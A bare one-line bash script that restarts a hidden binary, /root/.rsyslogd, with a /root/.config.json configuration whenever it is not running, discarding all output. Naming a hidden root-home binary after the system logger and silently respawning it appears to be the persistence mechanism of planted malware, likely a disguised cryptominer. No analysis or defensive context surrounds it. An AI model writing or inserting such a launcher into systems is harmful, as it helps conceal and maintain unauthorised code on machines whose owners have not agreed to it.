#!/bin/bash if ! pgrep -f '.rsyslogd' > /dev/null; then /root/.rsyslogd -c /root/.config.json > /dev/null 2>&1 & fi